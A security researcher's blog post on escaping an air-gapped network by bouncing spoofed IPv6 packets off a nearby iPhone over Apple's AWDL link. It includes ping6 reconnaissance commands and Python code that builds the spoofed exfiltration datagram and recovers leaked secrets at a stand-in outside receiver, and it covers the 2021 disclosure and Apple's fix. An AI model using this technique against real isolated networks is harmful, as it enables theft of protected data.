In this post I go through how to escape from a truly air gapped network using the Apple Wireless Direct Link (AWDL) network and an information leakage privacy issue in Apple devices. The issue was fixed by Apple on 24th of April 2021 with iOS 14.5, iPadOS 14.5, watchOS 7.4 and macOS Big Sur 11.3.
We go through the following scenario:
- An infected MacBook exists inside an air gapped high security network
- Anyone brings an iPhone into close physical proximity
- The MacBook leaks secret data to the Internet via the previously unknown iPhone from step 2
Lately my colleagues and I were discussing developing new tests for our Beacon product. Inspired by that, I started to read more about ICMPv6 from the point of view of testing network isolation. I found out that ICMPv6 has a Node Information Query (RFC 4620) that lets a node ask other nodes on the local link for their names and addresses. This feature is neat but it can have privacy implications in some cases. One such case is the Apple Wireless Direct Link (AWDL) network, a close range ad-hoc wireless network between Apple devices. It is there whenever Bluetooth and WiFi are enabled on your Apple device. AWDL is used for AirDrop, AirPlay, Handoff and other handy features. Apple has put plenty of effort into making AWDL as secure and private as possible, but there have been some issues in the past (https://owlink.org/).
IPv6 Node Information Query
While learning more about ICMPv6 I found the Node Information Query. I started to play around in my lab environment and found out that some systems, like Linux and Windows, don't actually respond to it, at least not yet or not anymore.
With macOS and iOS, however, it worked well. You can try it yourself if you own Apple devices. For example, running the command "ping6 -w ff02::1%en0" sends a Node Information name query to the all-nodes multicast address on en0, and if your Apple devices have not been patched yet, each one on your WiFi replies with its hostname (assuming your WiFi interface is en0).
Besides the name, you can query IPv6 addresses. That is done with "ping6 -a acgslA <target>", where the flag letters ask for all unicast (a), IPv4-compatible (c), global (g), site-local (s), link-local (l) and anycast (A) addresses. So you can first find the device you are interested in, which in this case was my test phone:
And then you can query all the IPv6 addresses of that device.
Apparently my test phone has addresses in two different public IPv6 networks, which makes sense since it has both a WiFi and a cellular connection.
Both queries work in the AWDL network as well. You can run "ping6 -w ff02::1%awdl0" and discover which Apple devices are near you. I think this is a bigger issue than the normal local network case because from the user's point of view it is impossible to control the AWDL network. Even if you turn off AirDrop, your device will still be part of the AWDL network. The only way to disable it is to completely disable WiFi or Bluetooth from the settings.
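To make concrete what the address query is actually returning, here is an added Python example (written for this page; it is not the author's tooling and not anything shipped by Apple) that parses an ICMPv6 Node Information Reply as laid out in RFC 4620 and picks out the global unicast addresses, which are the ones that can belong to another interface such as cellular. The reply bytes are constructed by hand: addresses from the 2001:db8::/32 documentation prefix stand in for a phone's WiFi and cellular global addresses, and the hostname is invented. The function and constant names are assumptions of this example.

```python
import ipaddress
import struct

ICMPV6_NI_REPLY = 140                     # Node Information Reply (RFC 4620)
NI_QTYPE_NODENAME, NI_QTYPE_NODEADDR = 2, 3
NI_SUCCESS, NI_REFUSED, NI_UNKNOWN_QTYPE = 0, 1, 2
# Flag bits of a Node Addresses query/reply (RFC 4620 section 4.3). ping6 -a's letters
# a, c, g, s, l set A, C, G, S, L; T in a reply means the address list was truncated.
NI_FLAG_T, NI_FLAG_A, NI_FLAG_C, NI_FLAG_L, NI_FLAG_S, NI_FLAG_G = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
GLOBAL_UNICAST = ipaddress.IPv6Network("2000::/3")


def _dns_name(data, off):
    """Decode one uncompressed DNS wire-format name starting at off; returns (name, next offset)."""
    labels = []
    while off < len(data):
        n = data[off]
        off += 1
        if n == 0:
            break
        labels.append(data[off:off + n].decode("ascii", "replace"))
        off += n
    return ".".join(labels), off


def parse_ni_reply(icmp):
    """Parse an ICMPv6 Node Information Reply given the ICMPv6 message (header included).
    Returns a dict with the reply code, qtype, flags, nonce and, on success, the decoded data.
    The ICMPv6 checksum is not verified here; that belongs to the layer that received the packet."""
    if len(icmp) < 16:
        raise ValueError("too short for an NI reply")
    typ, code, _csum, qtype, flags = struct.unpack("!BBHHH", icmp[:8])
    if typ != ICMPV6_NI_REPLY:
        raise ValueError("not a Node Information Reply")
    reply = {"code": code, "qtype": qtype, "flags": flags, "nonce": icmp[8:16]}
    data = icmp[16:]
    if code != NI_SUCCESS:
        return reply  # refused or unknown qtype: no data to parse
    if qtype == NI_QTYPE_NODEADDR:
        # Data is a list of (32-bit TTL, 128-bit IPv6 address) pairs.
        pairs = []
        for off in range(0, len(data) - 19, 20):
            ttl = struct.unpack("!I", data[off:off + 4])[0]
            pairs.append((ipaddress.IPv6Address(data[off + 4:off + 20]), ttl))
        reply["addresses"] = pairs
        reply["truncated"] = bool(flags & NI_FLAG_T)
    elif qtype == NI_QTYPE_NODENAME:
        # Data is a 32-bit TTL followed by node names in DNS wire format; an empty name ends the list.
        reply["ttl"] = struct.unpack("!I", data[:4])[0]
        names, off = [], 4
        while off < len(data):
            name, off = _dns_name(data, off)
            if not name:
                break
            names.append(name)
        reply["names"] = names
    return reply


def bounce_candidates(reply):
    """Addresses from a Node Addresses reply that are global unicast (2000::/3). Unlike the
    link-local addresses used on AWDL, these may sit on another interface with a route out."""
    return [str(a) for a, _ in reply.get("addresses", []) if a in GLOBAL_UNICAST]


def _ni_reply(qtype, flags, data, nonce=b"\x00" * 8):
    """Constructed reply bytes for the demo; checksum left zero since nothing sends it."""
    return struct.pack("!BBHHH", ICMPV6_NI_REPLY, NI_SUCCESS, 0, qtype, flags) + nonce + data


# Constructed replies standing in for what a test phone would answer: one link-local address
# plus a WiFi and a cellular global address (documentation prefix), and an invented hostname.
SAMPLE_ADDR_REPLY = _ni_reply(NI_QTYPE_NODEADDR, NI_FLAG_A | NI_FLAG_G | NI_FLAG_L, b"".join(
    struct.pack("!I", 0) + ipaddress.IPv6Address(a).packed
    for a in ("fe80::1c2d:3e4f:5a6b:7c8d", "2001:db8:1::a", "2001:db8:2::b")))
SAMPLE_NAME_REPLY = _ni_reply(NI_QTYPE_NODENAME, 0,
                              struct.pack("!I", 0) + b"\x0atest-phone\x05local\x00" + b"\x00")

if __name__ == "__main__":
    print(parse_ni_reply(SAMPLE_NAME_REPLY)["names"])
    print(bounce_candidates(parse_ni_reply(SAMPLE_ADDR_REPLY)))
```

Feeding a real reply captured with a packet sniffer into parse_ni_reply works the same way; the point of bounce_candidates is that only the 2000::/3 addresses are interesting for the next section, since the link-local ones are the AWDL side you already talk to.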
I reported this issue to Apple on 10th of September 2020 and it was fixed on 24th of April 2021 with iOS 14.5, iPadOS 14.5, watchOS 7.4 and macOS Big Sur 11.3.
Since at work we are constantly thinking about how to test network isolation for the most critical environments, I obviously started to think about whether this could be leveraged to escape from isolated and even air gapped networks.
Escaping from air gapped network
Let's say you have a fully air gapped high security network where you hold your most valuable secrets. Can we leak data out of an infected machine in that network whenever anybody walks physically near the environment with an iPhone in their pocket, using the AWDL ad-hoc network?
AWDL is well isolated by default, so there is no easy path out of the network. However, thanks to the ICMPv6 Node Information Query we know more about the devices near us. When you join an AWDL network, all the commonly shared data is anonymized and based on randomly generated addresses. Devices won't route your traffic anywhere and only link-local addresses are in use. There is not much to do beyond the designed functionality.
Since we now have the capability to collect the IP addresses of the other network interfaces on those devices, we can use a bit of trickery to get around some of the restrictions Apple has put in place.
In 2018 Ossi and I demonstrated at Disobey how to escape from a host-only network, among other escapes (https://youtu.be/xySjpz2rCSs?t=131). That trick was based on a technique called bouncing, and we use the same trick in this scenario.
Bouncing works like this. The bouncer does not allow communication between Alice and Bob. Alice sends a message to Charlie, which the bouncer allows, claiming (spoofing) that the sender of the message is Bob. When Charlie receives the message he replies to Bob that Bob is not allowed to communicate with Charlie, and includes the original message in that reply. This way Bob receives Alice's message even though the bouncer tried to deny it.
The fundamental idea is to confuse the network stack of the host used for bouncing and make it do things that are not expected. The confusion is caused by source IP spoofing combined with an ICMP error message and knowledge of the bounce target's IP addresses on all of its interfaces. In this scenario bouncing looks like this:
The leaker sends the secrets in a packet with a spoofed source (src) IPv6 address. The packet is sent to the iPhone's mobile cellular IPv6 address, which means it is handled by different rules in the network stack. Because nothing is listening on UDP port 1337 on the mobile interface, the iPhone sends an ICMPv6 error message (destination unreachable, port unreachable), which quotes the original packet and therefore the secrets, towards the spoofed source address via the mobile interface (which has a route), and the receiver gets the secrets.
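Here is an added, runnable Python model of the bounce described above (example code written for this page, not the tooling used in the video). It builds the leaker's spoofed UDP datagram, models what the bouncer's stack does for a closed port according to RFC 4443 section 3.1, and parses the resulting ICMPv6 error on the receiver side. All addresses are constructed from the 2001:db8::/32 documentation prefix and stand in for the iPhone's cellular address and the attacker's Internet host; the function and constant names are assumptions of this example. It also makes one limit of the technique explicit: an ICMPv6 error has to fit in the 1280-byte IPv6 minimum MTU, so each bounce carries at most 1184 bytes of UDP payload and a larger secret has to be split over several datagrams.

```python
import ipaddress
import struct

# Protocol constants (RFC 8200 / RFC 4443).
NH_UDP, NH_ICMPV6 = 17, 58
ICMPV6_DEST_UNREACH, ICMPV6_CODE_PORT_UNREACH = 1, 4
IPV6_HDR, UDP_HDR, ICMPV6_HDR = 40, 8, 8
IPV6_MIN_MTU = 1280
# An ICMPv6 error quotes at most as much of the invoking packet as keeps the error within the
# minimum MTU (RFC 4443 section 2.4); after the quoted IPv6 and UDP headers this much payload survives.
MAX_LEAK_PER_BOUNCE = IPV6_MIN_MTU - IPV6_HDR - ICMPV6_HDR - IPV6_HDR - UDP_HDR  # 1184

# Constructed addresses from the documentation prefix; they stand in for the iPhone's cellular
# global address (learned with the Node Information Query) and the attacker's Internet host.
BOUNCER_CELLULAR = "2001:db8:cafe::1"
RECEIVER = "2001:db8:beef::2"
LEAK_PORT = 1337


def _pack(addr):
    return ipaddress.IPv6Address(addr).packed


def _checksum(data):
    """RFC 1071 one's complement checksum (UDP over IPv6 and ICMPv6 both use it)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src, dst, upper_len, next_header):
    """IPv6 pseudo-header included in upper-layer checksums (RFC 8200 section 8.1)."""
    return src + dst + struct.pack("!I", upper_len) + b"\x00\x00\x00" + bytes([next_header])


def _ipv6_header(src, dst, payload_len, next_header, hop_limit=64):
    return struct.pack("!IHBB", 6 << 28, payload_len, next_header, hop_limit) + src + dst


def addresses_of(packet):
    """(src, dst) of a raw IPv6 packet as strings, to check who sent what to whom."""
    return str(ipaddress.IPv6Address(packet[8:24])), str(ipaddress.IPv6Address(packet[24:40]))


def build_spoofed_datagram(spoofed_src, bouncer, dport, secret, sport=40000):
    """Leaker side: UDP datagram carrying the secret, with the receiver's address as source."""
    src, dst = _pack(spoofed_src), _pack(bouncer)
    udp_len = UDP_HDR + len(secret)
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0) + secret
    csum = _checksum(_pseudo_header(src, dst, udp_len, NH_UDP) + udp) or 0xFFFF  # zero is not allowed over IPv6
    udp = udp[:6] + struct.pack("!H", csum) + udp[8:]
    return _ipv6_header(src, dst, udp_len, NH_UDP) + udp


def bounce(packet, listening_ports=frozenset()):
    """Model of the bouncer's stack: a UDP datagram to a port with no listener is answered with
    ICMPv6 Destination Unreachable / port unreachable (RFC 4443 section 3.1), addressed to the
    datagram's *source* and quoting as much of it as fits in the minimum MTU. Returns None when
    the datagram would instead be delivered to a socket, in which case nothing bounces."""
    src, dst = packet[8:24], packet[24:40]
    if packet[6] != NH_UDP:
        return None
    dport = struct.unpack("!H", packet[42:44])[0]
    if dport in listening_ports:
        return None
    quoted = packet[:IPV6_MIN_MTU - IPV6_HDR - ICMPV6_HDR]
    body = struct.pack("!BBHI", ICMPV6_DEST_UNREACH, ICMPV6_CODE_PORT_UNREACH, 0, 0) + quoted
    csum = _checksum(_pseudo_header(dst, src, len(body), NH_ICMPV6) + body)
    body = body[:2] + struct.pack("!H", csum) + body[4:]
    # The error goes from the bouncer's own address back to the spoofed source, i.e. the receiver.
    return _ipv6_header(dst, src, len(body), NH_ICMPV6) + body


def extract_leak(packet):
    """Receiver side: validate an ICMPv6 port-unreachable error and pull the secret out of the
    quoted datagram. Returns (bouncer address, secret bytes), or None if this is not a bounce."""
    if len(packet) < IPV6_HDR + ICMPV6_HDR + IPV6_HDR + UDP_HDR or packet[6] != NH_ICMPV6:
        return None
    icmp = packet[IPV6_HDR:]
    if icmp[0] != ICMPV6_DEST_UNREACH or icmp[1] != ICMPV6_CODE_PORT_UNREACH:
        return None
    if _checksum(_pseudo_header(packet[8:24], packet[24:40], len(icmp), NH_ICMPV6) + icmp) != 0:
        return None  # corrupted in transit or not a real ICMPv6 message
    quoted = icmp[ICMPV6_HDR:]
    if quoted[6] != NH_UDP:
        return None
    udp_len = struct.unpack("!H", quoted[IPV6_HDR + 4:IPV6_HDR + 6])[0]
    # The quote may have been cut at the MTU limit; take whatever survived of the UDP payload.
    secret = quoted[IPV6_HDR + UDP_HDR:IPV6_HDR + udp_len]
    return str(ipaddress.IPv6Address(quoted[24:40])), secret


if __name__ == "__main__":
    datagram = build_spoofed_datagram(RECEIVER, BOUNCER_CELLULAR, LEAK_PORT, b"top secret")
    error = bounce(datagram)
    print(addresses_of(error), extract_leak(error))
```

On a real network the datagram is written to a raw socket on the AWDL interface and the error shows up on the receiver's Internet-facing interface; everything between the two is what the bouncer's own stack does. Two practical consequences fall out of the model: the bounce only happens while nothing listens on the chosen port, and anything beyond MAX_LEAK_PER_BOUNCE bytes is silently dropped by the quote limit, so the leaker has to chunk.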
We made a short video demonstrating the following scenario.
The attacker has been able to infect one of the laptops inside an air gapped network. The infected machine holds secret data related to the environment and, since the network is fully isolated, the attacker continuously waits for an opportunity to use the AWDL ad-hoc network for data leakage. When a Bluetooth LE beacon is seen, the infected laptop joins the AWDL network and starts leaking the secret information via the device it sees, using the method described above.
Combining a tiny bit of extra information gathered with the IPv6 Node Information Query with old network trickery leads to a new, surprising leak vector. AWDL research has been on my radar for quite a long time from the privacy point of view and I have tried to figure out a way to do something like this, but the AWDL environment is actually pretty strict, so this was surprisingly tricky to figure out. Many times even a small bit of new information can make the difference.
- 2020–09–10: Privacy issue with the IPv6 Node Information Query function reported to Apple.
- 2021–04–07: Apple asks for details in order to credit the find.
- 2021–04–24: IPv6 Node Information Query functionality disabled in iOS 14.5, iPadOS 14.5, watchOS 7.4 and macOS Big Sur 11.3.